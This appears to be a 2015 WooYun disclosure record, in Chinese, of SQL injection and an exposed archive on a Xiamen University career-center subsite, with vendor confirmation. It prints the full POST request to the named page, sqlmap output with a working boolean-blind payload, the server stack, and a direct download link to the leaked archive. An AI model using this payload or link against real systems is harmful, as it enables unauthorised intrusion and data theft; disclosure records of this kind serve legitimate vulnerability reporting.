当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152636

漏洞标题:厦门大学某个子站存在两个注入点/打包文件下载

相关厂商:厦门大学

漏洞作者: 路人甲

提交时间:2015-11-08 20:47

修复时间:2015-12-24 09:32

公开时间:2015-12-24 09:32

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-08: 细节已通知厂商并且等待厂商处理中
2015-11-09: 厂商已经确认,细节仅向厂商公开
2015-11-19: 细节向核心白帽子及相关领域专家公开
2015-11-29: 细节向普通白帽子公开
2015-12-09: 细节向实习白帽子公开
2015-12-24: 细节向公众公开

简要描述:

厦门大学某子站存在两处SQL注入,外加一处打包文件下载

详细说明:

厦门大学学生就业创业指导中心存在一处注入和一处打包文件下载
注入点为留言搜索框,post注入:
http://jyzd.xmu.edu.cn/guestbook.asp

POST http://jyzd.xmu.edu.cn/guestbook.asp HTTP/1.1
Host: jyzd.xmu.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
DontTrackMeHere: gzip, deflate
Referer: http://jyzd.xmu.edu.cn/guestbook.asp
Cookie: Hm_lvt_498a2189837e9f09f4b98611412a86e0=1446562301,1446562454; ASPSESSIONIDQQBADDDQ=JFGGNKKCPBAAADBGFJNEEANJ; ASPSESSIONIDSQACCCCR=OKIMFALCBMIGHJJAFKIIGJGO
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
word=d&Submit=%CC%E1%BD%BB


证明:

sqlmap identified the following injection point(s) with a total of 83 HTTP(s) requests:
---
Parameter: word (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: word=d%' AND 6181=6181 AND '%'='&Submit=%CC%E1%BD%BB
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft Access
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: word (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: word=d%' AND 6181=6181 AND '%'='&Submit=%CC%E1%BD%BB
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft Access
No tables found
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: word (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: word=d%' AND 6181=6181 AND '%'='&Submit=%CC%E1%BD%BB
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft Access
No tables found
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: word (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: word=d%' AND 6181=6181 AND '%'='&Submit=%CC%E1%BD%BB
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft Access


压缩包下载:
http://jyzd.xmu.edu.cn/dd.rar

111.png


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-09 09:32

厂商回复:

已通知相关单位处理。

最新状态:

暂无


漏洞评价:

评价